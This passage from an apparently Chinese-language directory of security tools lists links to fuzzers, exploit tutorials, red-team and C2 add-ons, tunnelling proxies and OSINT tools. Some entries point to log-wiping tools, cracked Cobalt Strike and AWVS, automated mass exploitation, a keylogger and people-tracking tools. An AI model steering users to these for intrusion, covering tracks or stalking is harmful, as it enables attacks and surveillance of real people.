PY.一个基于模糊哈希(Fuzzy Hashing)算法的工具。GO.glaslos/ssdeep;C.ssdeep-project/ssdeep - https://github.com/jtpereyda/boofuzz PY.基于sulley测试框架的网络协议fuzz测试 - https://github.com/cisco-sas/kitty PY.针对TCP/IP的模糊测试框架 - https://github.com/cisco-sas/katnip PY.kitty框架的拓展库 - https://github.com/zyw-200/FirmAFL C.针对iot固件IoT firmware灰盒模糊测试 - https://github.com/xmendez/wfuzz PY.Web安全模糊测试工具,模块化可处理burp所抓请求和响应报文 - https://github.com/1N3/BlackWidow PY.利用爬虫收集目标网站的情报信息并对 OWASP 漏洞进行模糊测试 - https://bbs.ichunqiu.com/thread-24898-1-1.html Test404 -HTTP Fuzzer V3.0 - http://blog.topsec.com.cn/alphafuzzer/ 启明星辰阿尔法实验室以文件格式为主的漏洞挖掘工具 ### 学习二进制pwn - https://github.com/euphrat1ca/0day-security-software-vulnerability-analysis-technology 0day安全:软件漏洞分析技术(第2版) - 漏洞战争:软件漏洞分析精要 # - 加密与解密(第4版) # - modern windows exploit # - cnit的二进制教程 # - awesome windows exploit # - https://www.youtube.com/channel/UC_PU5Tk6AkDnhQgl5gARObA pwn学习三部曲学习 - https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/page/4/ exploit编写系列教程,10篇,后续在corelan网站上 - https://www.fuzzysecurity.com/tutorials.html fuzzysecurity教程。*egghunter - http://www.securitysift.com/windows-exploit-development-part-1-basics # - http://security.cs.rpi.edu/courses/binexp-spring2015/ 家用路由器0day - https://github.com/timip/OSEE # - https://www.youtube.com/watch?v=8zBpqc3HkSE&list=PLhx7-txsG6t6n_E2LgDGqgvJtCHPL7UFu windbg教程 - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg windbg - https://rootkits.xyz/blog/ windows内核系列 - https://github.com/saaramar/35C3_Modern_Windows_Userspace_Exploitation # - https://pwnrip.com/windows-kernel-exploitation-part-1-stack-buffer-overflows/ windows kernel exploit - https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References # - https://github.com/ExpLife0011/awesome-windows-kernel-security-development 一些较新的win exploit资料 - https://www.abatchy.com/tutorials windows kernel exploit - https://blahcat.github.io/tutorials/ windows kernel exploit - https://b3n7s.github.io/2017/11/01/windows-kernel-debugging-under-vmware-fusion.html windows kernel debugging under vm fusion - http://samdb.xyz/ intro to kernel exploit - https://github.com/hanc00l/rop_linux_kernel_pwn # - https://github.com/xairy/linux-kernel-exploitation # - https://azeria-labs.com/ arm 溢出 # 技术手段利用方式工具包集合 - https://github.com/infosecn1nja/Red-Teaming-Toolkit 红队开源和商业工具。goodjob。 - https://github.com/redcanaryco/atomic-red-team Atomic Red Team团队关于win、linux、mac等多方面apt利用手段、技术与工具集 - https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE 红队工具、攻击手段 - https://github.com/toolswatch/blackhat-arsenal-tools blackhat工具集 - https://github.com/demonsec666/Security-Toolkit 渗透攻击链中常用工具及使用场景 - https://github.com/n00py/ReadingList/blob/master/gunsafe.txt 安全工具集 - https://github.com/k8gege/ K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)。博客cnblogs.com/k8gege,常见解压密码Kk8team,Kk8gege。 - https://github.com/danielmiessler/SecLists 用户名,密码,URL,敏感数据模式,模糊测试负载,Web shell - https://github.com/Ridter/Pentest 后门、exp、fuzzing、字典、ps脚本 - https://github.com/alpha1e0/pentestdb WEB渗透测试数据库 - https://www.parrotsec.org 鹦鹉安全操作系统类似Kali - https://github.com/fireeye/commando-vm FireEye开源CommandoVM,专为红队(pen-testing)定制的Windows。类似kali - https://github.com/Cooolis/Cooolis.github.io Cooolis是一个操作系统命令技巧备忘录包含工具。倾旋。https://cooolis.payloads.online - https://github.com/ConsenSys/mythril-classic 用于以太坊智能协议的安全分析工具 - https://github.com/lionsoul2014/ip2region ip地址定位库,支持python3等多接口。类似geoip - https://github.com/sfan5/fi6s ipv6端口快速扫描器 - https://github.com/lavalamp-/ipv666 GO.ipv6地址枚举扫描 - https://github.com/ultrasecurity/webkiller PY.渗透辅助。ip信息、端口服务指纹、蜜罐探测、bypass cloudflare - https://github.com/medbenali/CyberScan PY.渗透测试辅助工具。支持分析数据包、解码、端口扫描、IP地址分析等 - https://github.com/opensec-cn/vtest PY.用于辅助安全工程师漏洞挖掘、测试、复现,集合了mock、httplog、dns tools、xss,可用于测试各类无回显、无法直观判断或特定场景下的漏洞。 ### 信息保护洋葱路由隐匿流量 - https://github.com/leitbogioro/Fuck_Aliyun 关闭阿里云监控服务 - https://github.com/Nummer/Destroy-Windows-10-Spying DWS用来关闭windows监控服务 - https://github.com/JusticeRage/freedomfighting 日志清理、文件共享、反向shell - https://github.com/Rizer0/Log-killer 日志清除,Windows/Linux 服务器中的所有 - https://github.com/360-A-Team/EventCleaner 日志擦除工具 - https://github.com/s-rah/onionscan darkweb暗网爬虫 - https://github.com/globaleaks/Tor2web darkweb暗网代理服务器,将onion的服务变为普通的服务 - https://github.com/milesrichardson/docker-onion-nmap 使用nmap扫描Tor网络上隐藏的"onion"服务 - https://github.com/GouveaHeitor/nipe 一个使所有流量通过Tor网络发出的脚本 - https://github.com/Edu4rdSHL/tor-router bash.使用tor代理全部流量。dnsleaktest.com dns检测。 - https://github.com/trimstray/multitor bash.启用多个TorBrowser通道转发流量,并设置负载均衡 - https://github.com/NullArray/NetSet bash.终端多路复用器,其会话通过Tor路由,并通过自动安装和配置DNSCrypt-proxy来保护DNS流量。 ### 容器安全 - https://vulnerablecontainers.org 对公开docker容器镜像漏洞扫描,并标出CVE号 - https://github.com/P3GLEG/WhaleTail 根据docker镜像生成成dockerfile - https://github.com/cr0hn/dockerscan docker扫描工具 - https://github.com/knqyf263/trivy GO.针对容器的漏洞扫描器.2K。 ### 测试字典 - https://github.com/TheKingOfDuck/fuzzDicts Web Pentesting Fuzz 字典 - https://github.com/7dog7/bottleneckOsmosis JS/api/param/FUZZ 字典 - https://github.com/tarraschk/richelieu .fr邮箱密码表 ### 程序功能模块库 - https://github.com/Microsoft/SymCrypt Windows使用的核心功能加密库 - https://github.com/unknownv2/CoreHook C#.基于.NET Core运行时实现的Windows HOOK库 - https://github.com/boy-hack/hack-requests PY3.python包模块。burp数据包重放、线程安全、底层包日志分析 - https://github.com/saghul/aiodns/ PY.请求后无需关闭连接的情况下有效地进行多次调用的DNS解析器 ## 相关工具拓展插件 - https://github.com/AntSword-Store/ 中国蚁剑插件市场 #### kali环境下拓展插件 - https://github.com/Manisso/fsociety linux下类似于kali的工具包一键安装工具 - https://github.com/LionSec/katoolin 使用linux服务器自动安装kali工具包 - https://github.com/TrustedSec/ptf/ PY.基于Debian/Ubuntu/ArchLinux下的测试工具安装管理工具 - https://github.com/koenbuyens/kalirouter 将kali设置为一个路由流量分析系统 - https://github.com/secforce/sparta PY.界面化,联动Nmap、Nikto、Hydra等工具 - https://github.com/skavngr/rapidscan PY2.simple,联动kali下工具,漏洞扫描工具 - https://github.com/baguswiratmaadi/reverie BASH.ParrotSecOs联动工具 ### Nessus相关工具拓展插件 - https://github.com/se55i0n/Awvs_Nessus_Scanner_API 扫描器Awvs 11和Nessus 7 Api利用脚本 - https://github.com/DanMcInerney/msf-autoshell 配合nessus扫描结果进行msf攻击 - https://github.com/MooseDojo/apt2 联动nmap、nessus等工具进行安全测试 #### awvs相关工具拓展插件 - https://www.52pojie.cn/thread-214819-1-1.html awvs10.5开发框架破解版。商业版 - https://github.com/fnmsd/awvs_script_decode awvs10.5规则scripts解密版,SDK,开发手册 - https://github.com/NS-Sp4ce/AWVS11.X-Chinese-Version JS.awvs11汉化包 - https://github.com/l3m0n/awvs_190703137 PY.Linux版awvs - https://github.com/grayddq/PublicSecScan PY.调用awvsAPI对WEB资产进行分布式WEB安全扫描,发现web环境下常规的一些安全漏洞 #### burpsuit相关工具拓展插件 - https://github.com/PortSwigger burpsuite官方插件库,商业版 - https://github.com/snoopysecurity/awesome-burp-extensions awesome系列之burp拓展 - https://github.com/d3vilbug/HackBar hackbar - https://github.com/bit4woo/knife burp增强右键菜单 - https://github.com/nccgroup/BurpSuiteHTTPSmuggler 使用几种技巧绕过WAF - https://github.com/nccgroup/argumentinjectionhammer Burp插件.识别参数注入漏洞 - https://github.com/modzero/interestingFileScanner 增强敏感文件扫描 - https://github.com/c0ny1/chunked-coding-converter 本插件主要用于分块传输绕WAF #### sqlmap相关工具拓展插件 - https://github.com/codewatchorg/sqlipy burp与sqlmap联动插件 - https://github.com/Hood3dRob1n/SQLMAP-Web-GUI PHP.sqlmap的web gui - https://github.com/KINGSABRI/sqlmap-tamper-api 利用各种语言来编写sqlmapTamper - https://github.com/0xbug/SQLiScanner 一款基于sqlmapapi和Charles的被动SQL注入漏洞扫描工具 - https://github.com/fengxuangit/Fox-scan 基于sqlmapapi的主动和被动资源发现的漏洞扫描工具 - https://github.com/UltimateHackers/sqlmate 在sqlmap基础上增加了目录扫描、hash爆破等功能 - https://github.com/ysrc/GourdScanV2 ysrc出品的被动式漏洞扫描工具,基于sqlmapapi - https://github.com/zt2/sqli-hunter 基于sqlmapapi,ruby编写的漏洞代理型检测工具 - https://github.com/jesuiscamille/AutoSQLi 利用DorkNet,Googler, Ddgr, WhatWaf 和 sqlmap自动注入 #### nmap相关工具拓展插件 - https://github.com/Ullaakut/nmap GO.实现的Nmap调用库 - https://github.com/cldrn/nmap-nse-scripts NSE收集列表 - https://github.com/vulnersCom/nmap-vulners 使用nmap扫描常见的服务漏洞 - https://github.com/s4n7h0/Halcyon Nmap Script (NSE)IDE编辑器 - https://github.com/m4ll0k/AutoNSE NSE自动化利用 - https://github.com/Rvn0xsy/nse_vuln Nmap扫描漏洞利用脚本。tomcat、weblogic、http(CVE-2017-12615/CNVD-C-2019-4814/CVE-2018-2894) - https://github.com/Screetsec/Dracnmap BASH.将Nmap复杂的命令进行一定程度的集成与简化,使新用户更加容易上手。 - https://github.com/cldrn/rainmap-lite DjanGO.Web版Nmap,可以建立新的扫描服务器,允许用户从他们的手机/平板电脑/网络浏览器启动Nmap扫描 - https://github.com/trimstray/sandmap BASH.linux下Nmap可配置形式的命令行操作台 - https://github.com/m0nad/HellRaiser 基于nmap的扫描器,与cve漏洞关联 - https://github.com/scipag/vulscan 基于nmap的高级漏洞扫描器,命令行环境使用 - https://github.com/Rev3rseSecurity/WebMap 将nmap的xml web展示器 - https://github.com/DanMcInerney/msf-autopwn 执行NMap扫描或读取扫描结果, 然后自动使用msf攻击包含常见漏洞的主机 - https://github.com/rootlabs/nWatch 联动nmap,并对组织内网进行扫描 - https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest 集成子域名枚举、nmap、waf指纹识别等模块的web应用扫描器 - https://github.com/ring04h/wyportmap 调用nmap目标端口扫描+系统服务指纹识别 - https://github.com/johnnyxmas/scancannon BASH.联动masscan和nmap #### metasploit相关工具拓展插件 - https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit 结合机器学习与msf的全自动测试工具 - https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 一个可以创建SSL/TLS shell连接的脚本 - https://github.com/DanMcInerney/msf-netpwn 等待msf的session,并自动提为域管理 - https://github.com/NullArray/AutoSploit 利用Shodan API搜索引擎收集目标, 并自动调用设定的msf模块对目标发动攻击 - https://github.com/WazeHell/metateta 使用msf脚本,根据特定协议进行扫描 - https://github.com/fbkcs/msf-elf-in-memory-execution Metasploit模块, 用于在内存中执行ELF文件 - https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit metasploit双星攻击利用文件 - https://github.com/darkoperator/Metasploit-Plugins msf扩展资产搜集与帮助插件 - https://github.com/D4Vinci/One-Lin3r metasploit、payload辅助查询工具 - https://github.com/shizzz477/msploitego 将msf数据库与maltego进行图形化展示 - https://github.com/scriptjunkie/msfgui metasploit的GUI界面,强化Windows下支持 - https://github.com/WayzDev/Kage MSF的GUI界面,Session Handler #### CobaltStrike相关工具拓展插件 - https://github.com/rsmudge/armitage JAVA.CobaltStrike社区版,调用msf,多session带界面 - https://wbglil.gitbooks.io/cobalt-strike/content/ Cobalt Stike3.13中文使用文档,软件。 - https://github.com/verctor/CS_xor64 JAVA.生成cobaltstrike破解版所需的xor64.bin - https://github.com/Mr-Un1k0d3r/SCT-obfuscator Cobalt Strike SCT有效载荷混淆器 - https://github.com/dcsync/pycobalt PY3.Python API for Cobalt Strike - https://github.com/rsmudge/cortana-scripts JAVA.用于cs2.x与armitage的可拓展插件,cvs3.x的为AggressorScripts - https://github.com/FortyNorthSecurity/AggressorAssessor cs3.x自动化攻击脚本集合 - https://mp.weixin.qq.com/s/CEI1XYkq2PZmYsP0DRU7jg intro.使用Aggressor脚本雕饰Cobalt Strike - https://github.com/Ridter/CS_Chinese_support/ cs3.0传输信息的汉化插件 - https://github.com/ryhanson/ExternalC2 一个用于将通信渠道与Cobalt Strike External C2服务器集成的库 - https://github.com/threatexpress/cs2modrewrite 用于将Cobalt Strike配置文件转换为mod_rewrite脚本的工具 - https://github.com/Mr-Un1k0d3r/CatMyFish 搜索分类域,为Cobalt Strike beacon C&C设置白名单域 - https://github.com/threatexpress/malleable-c2 利用jquery文件进行C2通讯,在文件内做了JS混淆绕过防火墙 - https://github.com/phink-team/Cobaltstrike-MS17-010 cobaltstrike ms17-010(win7 x64 and win2008 r2)等插件 - https://github.com/pxss/navicatpwd Cobalt Strike Navicate解密脚本 - https://blog.csdn.net/qq_27446553/article/details/79380021 邮件上线提醒 #### Empire相关工具拓展插件 - https://paper.tuisec.win/detail/f3dce68a0b4baaa 利用Empire获取域控权限 - https://github.com/EmpireProject/Empire-GUI empire的node.js界面 - https://github.com/interference-security/empire-web empire的web界面 - https://github.com/byt3bl33d3r/DeathStar PY3.调用Empire RESTful API 自动化获取域管权限的 - https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html DeathStar教程 - https://github.com/infosecn1nja/e2modrewrite 用于将Empire配置文件转换为Apache modrewrite脚本 ### Cross超越边界NPV - https://www.wireguard.com/install/ 新一代npv协议 - https://github.com/bannedbook/fanqiang/wiki cross汇总 - https://github.com/ToyoDAdoubi/doubi 各种常用一键脚本 - https://github.com/teddysun/across BASH.npv、bbr、kms等脚本 - https://github.com/Nyr/openvpn-install openvpn一键安装 - https://github.com/quericy/one-key-ikev2-vpn CentOS/Debian/Ubuntu一键安装IPSEC/IKEV2 VPN脚本 - https://github.com/teddysun/shadowsocks_install shadowsocks,shadowsocksr - https://github.com/guyingbo/shadowproxy ss/socks5/http//https等多种代理 - https://github.com/shadowsocks/shadowsocks-manager shadowsocks多用户管理 - https://github.com/leitbogioro/SSR.Go shadowsocksrr配置管理简化工具 - https://github.com/Ehco1996/django-sspanel 基于Django的shadowsocks网络面板 - https://github.com/ssrpanel/SSRPanel ss\ssr\v2ray用户分布式管理 - https://github.com/xuanhuan/ss-panel ss用户分布式管理 - https://github.com/Ahref-Group/SS-Panel-smarty-Edition ss用户分布式管理,兑换码功能、商城系统,服务器信息 - https://github.com/txthinking/brook GO.支持Linux/MacOS/Windows/Android/iOS的代理与vpn - https://github.com/Ccapton/brook-web brook程序服务端Web后台管理服务器(Linux|MacOS),基于python、flask、flask-restful - https://github.com/Ccapton/brook-ok bash.Brook一键安装脚本 - https://github.com/v2ray GO.多协议代理 - https://github.com/gwuhaolin/lightsocks 轻量级网络混淆代理,基于 SOCKS5 协议,类SS - https://github.com/Umbrellazc/BypassCampusNet 校园网防断网; UDP 53 免流上网 - https://github.com/netchx/Netch C#.类似sockscap64通过进程选择代理。通过虚拟网卡转为类VPN全局代理SSTAP。proxifier - https://github.com/ntkernel/lantern unlimited-landeng-for-win,无限流量蓝灯 - https://www.psiphon3.com 开源赛风超越边界代理 - http://www.vpngate.net 日本国立筑波大学超越边界代理 - https://hide.me npv可试用 - https://windscribe.com npv可试用 - https://mono.sh 飞机场 ## 端口转发映射代理穿透 - https://github.com/fatedier/frp Golang.用于内网穿透的高性能的反向代理应用,多协议支持,支持点对点穿透,范围端口映射。25k。greatjob。 - https://github.com/cnlh/nps GO.内网穿透代理服务器。支持tcp、udp流量转发,支持内网http代理、内网socks5代理,同时支持snappy压缩、站点保护、加密传输、多路复用、header修改等。支持web图形化管理,集成多用户模式。 - https://github.com/vzex/dog-tunnel GO.Linux下基于kcp的p2p端口映射工具,同时支持socks5代理。1.6k。 - https://github.com/SECFORCE/Tunna PY.将TCP协议通过HTTP封装传递,可以用于绕过防火墙环境中的网络限制 - https://github.com/fbkcs/thunderdns PY.将tcp流量通过DNS协议转发,不需要客户端和socket5支持 - https://github.com/cloudflare/mmproxy C.在负载均衡HAProxy代理的基础上支持proxy-protocol协议,可以传递客户端TCP协议的真实IP - https://github.com/inconshreveable/ngrok GO.端口转发,正反向代理,内网穿透.17K。 - https://github.com/ls0f/gortcp GO.内网穿透、远程文件上传下载、命令执行.G:rtcp;G:NATBypass。 - http://rootkiter.com/Termite C.EarthWorm(EW)升级版,可以实现多节点跳跃,提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 - https://github.com/Dliv3/Venom GO.类似于Termite/EarthWorm的多节点连接跳板构建多级代理工具 - https://github.com/decoder-it/psportfwd PowerShell.端口转发工具, 无需admin权限 - https://github.com/davrodpin/mole GO.基于ssh的端口转发 - https://github.com/sensepost/reGeorg PY.reDuh 的升级版,主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口(提供了php,asp,jsp脚本的正反向代理)。1.3K。 - https://github.com/SpiderClub/haipproxy PY3.Scrapy and Redis,高可用ip代理池 - https://github.com/chenjiandongx/async-proxy-pool py3.异步爬虫ip代理池 - https://github.com/audibleblink/doxycannon PY.使用一个openvpn代理池,为每一个生成docker,当连接某一个vpn后,其它的进行socks5转发做流量分发 # 信息搜集OSINT - http://www.scribd.com/document/72008744/OSINT-Cheat-Sheet OSINT Cheat Sheet信息收集技巧 - https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php JAVA.多维度信息收集,支持扩展不同社交媒体插件。 - https://github.com/smicallef/spiderfoot PY.利用OSINT自动化找出对方信息,gui界面,插件化,在线SpiderFoot HX服务。2K。greatjob。 - https://github.com/Nhoya/gOSINT GO.利用OSINT自动化搜集信息 - https://github.com/alienwithin/OWASP-mth3l3m3nt-framework 渗透辅助,php,exp搜寻、payload与shell生产、信息收集 - https://github.com/yassineaboukir/Asnlookup simple。利用ASN搜索特定组织拥有ip,联动nmap、masscan进行进一步信息扫描 - https://github.com/super-l/superl-url PY.根据关键词,对搜索引擎内容检索结果的网址内容进行采集 - https://github.com/woj-ciech/Danger-zone 关联域名、IP 和电子邮件地址之间的数据并将其可视化输出 - https://github.com/HurricaneLabs/machinae PY.ip/url/file/email/dns/hash/domain多接口 ### 在线网站信息搜集 - https://shodan.io 互联网感知引擎 - https://www.zoomeye.org 知道创宇互联网感知引擎 - https://censys.io 密歇根大学感知扫描器,zmap团队 - https://fofa.so 白帽汇NOSEC - https://www.oshadan.com 傻蛋联网设备搜索,湖南安数网络。NOupdate。 - https://hackertarget.com/ip-tools/ 提供api、ip相关工具,在线扫描器,工具文章研究博客。 - https://safeweb.norton.com 诺顿网站安全检测 - http://www.link114.cn/title/ 批量查询网站标题 - https://www.whatweb.net/ 在线web指纹识别 - http://www.webscan.cc/ 同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具 - https://www.phpinfo.me/bing.php 在线旁站查询|C段查询|必应接口C段查询 - https://www.phpinfo.me/domain/ 在线子域名爆破 - http://ceye.io 在线dns查询,http请求解析,日志记录 - https://www.dnsdb.io DNS查询,子域名查询,IP查询,A记录查询,域名解析,旁站查询 - https://dnsdumpster.com/ dns recon and research, find and lookup dns records - http://ip.chaxun.la/ ip反查域名---查询啦 - https://bgp.he.net bgp/asn/isp在线搜集工具 - http://tools.bugscaner.com 常用工具集汇总 ### PDNS(Passive DNS)收集系统 - https://github.com/JustinAzoff/bro-pdns GO.基于bro的pdns收集工具 - https://www.circl.lu/services/passive-dns pdns服务 - https://community.riskiq.com pdns服务 ### 子域名C段 - https://github.com/laramies/theHarvester PY.企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts - https://github.com/blechschmidt/massdns C.通过DNS高效子域发现工具 - https://github.com/SpiderLabs/HostHunter PY3.通过多接口,ssl证书进行hostname子域名查询。 - https://github.com/caffix/amass GO.通过DNS\API接口、搜索引擎等进行子域名搜集,使用机器学习猜测子域名。owasp项目。3k。goodjob。 - https://github.com/OJ/gobuster Golang.根据dns查询子域名和web目录爆破的工具,自带字典 - https://github.com/michenriksen/aquatone GO.子域名枚举、探测工具。可用于子域名接管漏洞探测 - https://github.com/euphrat1ca/LayerDomainFinder C#.cnseay法师Layer子域名挖掘机 - https://github.com/guelfoweb/knock PY.通过爆破进行子域名获取,可用于查找子域名接管漏洞 - https://github.com/aboul3la/Sublist3r PY.通过搜索引擎与爆破快速子域枚举工具 - https://github.com/Ice3man543/subfinder Golang.go实现的Sublist3r - https://github.com/TheRook/subbrute PY.扫描器中常用的子域名爆破API库 - https://github.com/nahamsec/lazyrecon BASH.侦查reconnaissance过程自动化脚本,可自动使用Sublist3r/certspotter获取子域名,调用nmap/dirsearch等 - https://github.com/FeeiCN/ESD PY3.爆破搜集子域名 - https://github.com/guimaizi/get_domain py.SRC域名收集与监测V3.0 - https://github.com/pentester-io/commonspeak BASH.Linux下直接用 Google big query 查 alexa top 1M 的子域名 和 一些文件路径 (也有其他数据集) - https://github.com/blark/aiodnsbrute/ PY3.DNS异步爆破子域名 - https://github.com/lijiejie/subDomainsBrute PY.开发的一款使用广泛的子域名爆破枚举工具 - https://github.com/ring04h/wydomain PY.猪猪侠开发的一款域名子域名枚举工具 - https://github.com/n4xh4ck5/N4xD0rk PY.利用搜索引擎来搜集子域名,可以使用西班牙语搜集 - https://github.com/vysec/DomLink PY2.调用WHOXY.com,对邮箱和域名进行进一步的搜集 - https://github.com/jonluca/Anubis PY3.子域名爆破与信息收集 - https://github.com/le4f/dnsmaper PY.web界面,子域名枚举爆破工具以及地图位置标记 - https://github.com/thewhiteh4t/seeker PY.获取高精度地理信息和设备信息的工具 - https://github.com/0xbug/orangescan web界面,的在线子域名信息收集工具 - https://github.com/We5ter/GSDF PY.基于谷歌SSL透明证书的子域名查询脚本 - https://github.com/mandatoryprogrammer/cloudflare_enum PY.利用CloudFlare的dns进行子域名枚举 - https://github.com/x0day/bannerscan PY.C段/旁站查询与路径扫描 - https://github.com/Xyntax/BingC PY.基于Bing搜索引擎的C段/旁站查询,多线程 - https://github.com/zer0h/httpscan PY.网段Web主机发现小工具 - https://github.com/s0md3v/ReconDog PY.simple,侦查信息的瑞士军刀 - https://github.com/chrismaddalena/ODIN PY3.simple,信息收集与后期漏洞利用 - https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker 多方式收集目标子域名信息 - https://github.com/code-scan/BroDomain 子域名查询 - https://github.com/chuhades/dnsbrute GO.dns子域名爆破工具 - https://github.com/evilsocket/dnssearch GO.dns子域名爆破工具 - https://github.com/reconned/domained PY.可用于子域名收集的一款工具 - https://github.com/bit4woo/Teemo PY.多方式域名收集及枚举工具 - https://github.com/swisskyrepo/Subdomino PY.子域名枚举,端口扫描,服务存活确认 - https://github.com/nmalcolm/Inventus PY.通过爬虫实现的子域名收集工具 ### 敏感信息泄露发现 - https://github.com/Yelp/detect-secrets PY.防止代码中的密码等相关敏感信息被提交到代码库中,可以在保证安全性的同时不会给开发者的生产力带来任何影响 - https://github.com/Acceis/leakScraper 处理和可视化大规模文本文件, 查找敏感信息, 例如证书 - https://github.com/Raikia/CredNinja 多线程用户凭证验证脚本,比如验证dump的hash是否属于此机器,利用445端口进行协议验证 - https://github.com/CERTCC/keyfinder 查找并分析私钥/公钥文件(文件系统中), 支持 Android APK 文件 - https://github.com/Ice3man543/hawkeye GO.cli端,文件系统分析工具,快速查找文件内包含的SSH密钥,日志文件,Sqlite数据库,密码文件等 - https://github.com/D4Vinci/Cr3dOv3r 根据邮箱自动搜索泄漏的密码信息,也可测试账户密码在各大网站能否登录的工具 - https://github.com/lijiejie/idea_exploit PY.利用 IDE config folder (.idea) 进行文件下载 - https://github.com/shengqi158/svnhack PY.文件夹*.svn*泄漏利用工具 - https://www.waitalone.cn/seay-svn-poc-donw-20140505.html Seay-Svn源代码泄露漏洞利用工具,2014-05-05版 - https://github.com/Graph-X/davscan PY,BASH.用于扫描启用DAV网盘服务的Web服务器上的隐藏文件和文件夹 - https://github.com/Threezh1/JSFinder PY.用于发现网站js文件中的url与域名 - https://github.com/eldraco/domain_analyzer PY.DNS servers, mail servers, IP addresses, mails on Google, SPF information等,支持插件,可生成报告,支持爬虫启动搜集。 - https://github.com/mhelwig/privdns PY3.利用nameserver的错误配置,dns解析暴露其内网地址 ## 云安全相关 ### 亚马逊AWS安全相关 - https://github.com/RhinoSecurityLabs/Cloud-Security-Research PY.AWS云安全研究,工具集。 - https://github.com/RhinoSecurityLabs/pacu 亚马逊AWS漏洞检测框架 - https://github.com/stuhirst/awssecurity/blob/master/arsenal.md AWS 安全检测相关的项目列表 - https://github.com/toniblyx/my-arsenal-of-aws-security-tools AWS安全工具集 - https://github.com/sa7mon/S3Scanner 扫描amazon公开的S3 buckets和dump - https://github.com/kromtech/s3-inspector 检测亚马逊AWS S3 bucket permissions - https://github.com/jordanpotti/AWSBucketDump 枚举AWS S3 buckets以查找敏感机密的文件 - https://github.com/Netflix/repokid AWS 最低权限策略部署工具 ### Git安全相关 - https://github.com/0xbug/Hawkeye JS,PY.GitHub 泄露监控系统 - https://github.com/neal1991/gshark github信息泄露检测 - https://github.com/VKSRC/Github-Monitor JS.GitHub监控,代码信息泄露,分钟级监控,邮件预警 - https://github.com/metac0rtex/GitHarvester github Repo信息收集工具 - https://github.com/repoog/GitPrey GitHub敏感信息扫描工具 - https://github.com/FeeiCN/GSIL PY3.近实时监控Github敏感信息,并发送告警通知。 - https://github.com/UnkL4b/GitMiner github敏感内容挖掘 - https://github.com/dxa4481/truffleHog GitHub敏感信息扫描工具,包括检测commit等 - https://github.com/Hell0W0rld0/Github-Hunter github信息监测脚本 - https://github.com/awslabs/git-secrets 防止将敏感数据提交到 git 仓库的工具 - https://github.com/zricethezav/gitleaks GO.检查git repo中的密码信息和密钥。G:git-hound. - https://github.com/internetwache/GitTools SHELL\PY3.查找、下载、提取 .git 。1.4k。 - https://github.com/BugScanTeam/GitHack PY.可还原历史版本, .git 泄漏利用工具 ### 目录路径发现 - https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project JAVA.目录路径枚举Fuzz爆破 - https://github.com/ffuf/ffuf GO.web网站路径、参数、子域名、数据模糊测试(fuzzing) - https://github.com/7kbstorm/7kbscan-WebPathBrute C#.目录路径爆破 - https://github.com/TheM4hd1/PenCrawLer C#.界面,web爬虫与目录路径爆破工具,除了常规扫描增加了递归爆破模式 - https://github.com/maurosoria/dirsearch 经典目录路径扫描 - https://github.com/Xyntax/DirBrute 目录路径爆破工具 - https://github.com/abaykan/crawlbox 目录路径路径扫描器 - https://github.com/deibit/cansina 目录路径路径扫描器 - https://github.com/UltimateHackers/Breacher 多线程的后台路径扫描器,也可用于发现Execution After Redirect漏洞 - https://github.com/fnk0c/cangibrina 通过字典穷举、google、robots.txt等途径的跨平台后台管理路径扫描器 - https://github.com/Go0s/SitePathScan 基于协程的目录路径爆破工具,配合aiohttp扫描路径比之前快了三倍有余 - https://github.com/0daysec/webscan_dir PY.轻量级web目录扫描器,支持选择字典和过滤状态码 - https://github.com/lijiejie/BBScan PY.网站信息泄漏批量扫描脚本 - https://github.com/jerrychan807/WSPIH PY3.敏感文件路径扫描下载 - https://github.com/aipengjie/sensitivefilescan PY2.网站敏感文件扫描工具 - https://github.com/Mosuan/FileScan PY.网站敏感文件扫描 / 二次判断降低误报率 / 扫描内容规则化 / 多目录扫描 - https://github.com/Xyntax/FileSensor PY3.动态敏感文件探测工具 - https://github.com/ring04h/weakfilescan PY.多线程网站泄露信息检测工具 ## 社工相关 - https://github.com/brannondorsey/PassGAN PY.深度学习,密码字典样本生成 - https://github.com/Mebus/cupp PY.根据用户习惯密码生成弱口令探测 - https://github.com/Saferman/cupper PY.根据用户习惯密码生成弱口令探测,楼上升级 - https://github.com/LandGrey/pydictor PY3.特定密码字典生成 - https://github.com/mehulj94/Radium-Keylogger py.键盘记录工具 - https://github.com/threatexpress/domainhunter 检查过期域名,bluecoat分类和Archive.org历史记录,以确定最为适合于钓鱼和C2的域名 - https://github.com/Mr-Un1k0d3r/CatMyPhish 收集目标类似的尚未注册的域名 - https://github.com/thinkst/canarytokens 重要文件的追踪溯源,信标定位(https://canarytokens.org/generate#) - https://github.com/ggerganov/kbd-audio C++.linux下利用麦克风监控键盘输入测试输入值 - https://github.com/Viralmaniar/I-See-You bash.利用公网网站代理获取用户的真实地理信息。simple ### 人员信息搜集 - https://github.com/jofpin/trape PY.利用OSINT对人员进行追踪定位。4k。 - https://www.jianshu.com/p/147cf5414851 聊聊那些常见的探侦类APP - https://www.truthfinder.com 美国公民信息查询。商业版 - https://hunter.io/ 企业邮箱搜集。商业版。 - https://infotracer.com 姓名、手机、邮件地址等信息track。商业版。 - https://recruitin.net Easily use Google to search profiles on LinkedIn - https://github.com/famavott/osint-scraper 输入人名或邮箱地址, 自动从互联网爬取关于此人的信息 - https://github.com/xHak9x/fbi 